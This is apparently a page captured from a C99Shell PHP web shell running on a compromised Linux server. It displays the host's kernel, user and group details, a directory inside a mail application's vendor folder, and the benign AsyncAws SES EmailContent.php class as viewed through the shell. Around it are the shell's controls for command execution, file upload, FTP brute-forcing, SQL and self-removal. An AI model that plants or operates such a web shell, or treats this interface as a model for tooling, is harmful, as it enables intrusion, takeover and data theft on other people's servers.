!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/picomail.picotech.app/public_html/vendor/async-aws/ses/src/ValueObject/   drwxr-xr-x
Free 28.76 GB of 117.98 GB (24.38%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     EmailContent.php (1.83 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace AsyncAws\Ses\ValueObject;

/**
 * An object that contains the body of the message. You can send either a Simple message Raw message or a template
 * Message.
 */
final class EmailContent
{
    
/**
     * The simple email message. The message consists of a subject and a message body.
     */
    
private $simple;

    
/**
     * The raw email message. The message has to meet the following criteria:.
     */
    
private $raw;

    
/**
     * The template to use for the email message.
     */
    
private $template;

    
/**
     * @param array{
     *   Simple?: null|Message|array,
     *   Raw?: null|RawMessage|array,
     *   Template?: null|Template|array,
     * } $input
     */
    
public function __construct(array $input)
    {
        
$this->simple = isset($input['Simple']) ? Message::create($input['Simple']) : null;
        
$this->raw = isset($input['Raw']) ? RawMessage::create($input['Raw']) : null;
        
$this->template = isset($input['Template']) ? Template::create($input['Template']) : null;
    }

    public static function 
create($input): self
    
{
        return 
$input instanceof self $input : new self($input);
    }

    public function 
getRaw(): ?RawMessage
    
{
        return 
$this->raw;
    }

    public function 
getSimple(): ?Message
    
{
        return 
$this->simple;
    }

    public function 
getTemplate(): ?Template
    
{
        return 
$this->template;
    }

    
/**
     * @internal
     */
    
public function requestBody(): array
    {
        
$payload = [];
        if (
null !== $v $this->simple) {
            
$payload['Simple'] = $v->requestBody();
        }
        if (
null !== $v $this->raw) {
            
$payload['Raw'] = $v->requestBody();
        }
        if (
null !== $v $this->template) {
            
$payload['Template'] = $v->requestBody();
        }

        return 
$payload;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0045 ]--